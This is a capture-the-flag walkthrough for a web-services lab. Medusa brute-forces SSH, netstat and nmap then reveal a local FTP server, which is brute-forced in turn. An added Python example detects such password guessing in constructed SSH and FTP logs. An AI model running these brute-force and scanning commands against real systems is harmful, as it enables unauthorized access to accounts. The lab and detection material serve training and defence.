Web Services

What was the password for the ftpuser?

Getting the flag:

Step 1 - Launch the attack with this password wordlist:

  • medusa -h <SERVER_IP> -n <SERVER_PORT> -u sshuser -P 2023-200_most_used_passwords.txt -M ssh -t 3

Step 2 - Login to the server with the password we just found:

  • ssh sshuser@<SERVER_IP> -p <SERVER_PORT>

Step 3 - Expand the Attack Surface:

  • Run netstat to list the open ports and the services listening on them:

    • netstat -tulpn | grep LISTEN

    • The output shows that port 21 is open

  • Confirm that port 21 is open with nmap:

    • nmap 127.0.0.1

Step 4 - Targeting the FTP Server:

  • Brute-force the authentication mechanism:

    • medusa -h 127.0.0.1 -u ftpuser -P 2020-200_most_used_passwords.txt -M ftp -t 5

Step 5 - Retrieve the flag:

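Seen from the defender's side, steps 1, 2 and 4 leave the same trail in the authentication logs: a run of failed logins for one account followed by a success. The Python below is an added example, not part of the original walkthrough, that flags this pattern in constructed log lines; the vsftpd-style FTP log format, the threshold of 5 and all addresses, hostnames and PIDs are assumptions.

```python
import re
from collections import defaultdict

# Log formats assumed: OpenSSH syslog lines and vsftpd-style FTP lines.
SSH_RE = re.compile(r"sshd\[\d+\]: (Failed|Accepted) password for (?:invalid user )?(\S+) from (\S+) port")
FTP_RE = re.compile(r'\[(\S+)\] (FAIL|OK) LOGIN: Client "(?:::ffff:)?([^"]+)"')
LOOPBACK = {"127.0.0.1", "::1"}

def parse(line):
    """Return (service, user, source, success) or None for unrelated lines."""
    m = SSH_RE.search(line)
    if m:
        return "ssh", m.group(2), m.group(3), m.group(1) == "Accepted"
    m = FTP_RE.search(line)
    if m:
        return "ftp", m.group(1), m.group(3), m.group(2) == "OK"
    return None

def detect_guessed_logins(log_text, threshold=5):
    """Flag a successful login preceded by >= threshold failures for the
    same (service, user, source); the counter resets on each success."""
    failures = defaultdict(int)
    alerts = []
    for line in log_text.splitlines():
        event = parse(line)
        if event is None:
            continue
        service, user, source, success = event
        key = (service, user, source)
        if not success:
            failures[key] += 1
            continue
        if failures[key] >= threshold:
            alerts.append({"service": service, "user": user, "source": source,
                           "failures": failures[key],
                           "from_host_itself": source in LOOPBACK})
        failures[key] = 0
    return alerts

# Constructed sample data (documentation addresses, invented PIDs and times).
SAMPLE_LOG = "\n".join(
    [f"Jan 10 10:00:{i:02d} srv sshd[900]: Failed password for sshuser from 203.0.113.7 port {40000 + i} ssh2" for i in range(8)]
    + ["Jan 10 10:00:09 srv sshd[900]: Accepted password for sshuser from 203.0.113.7 port 40009 ssh2"]
    + [f'Wed Jan 10 10:05:{i:02d} 2024 [pid 77] [ftpuser] FAIL LOGIN: Client "127.0.0.1"' for i in range(12)]
    + ['Wed Jan 10 10:05:13 2024 [pid 77] [ftpuser] OK LOGIN: Client "127.0.0.1"']
    # One mistyped password followed by a success stays below the threshold.
    + ["Jan 10 10:07:00 srv sshd[950]: Failed password for admin from 198.51.100.9 port 50000 ssh2",
       "Jan 10 10:07:05 srv sshd[950]: Accepted password for admin from 198.51.100.9 port 50001 ssh2"]
)

if __name__ == "__main__":
    for alert in detect_guessed_logins(SAMPLE_LOG):
        print(alert)
```

The `from_host_itself` field marks the FTP case from step 4, where the guesses come from the loopback address and so never appear as traffic from a remote source.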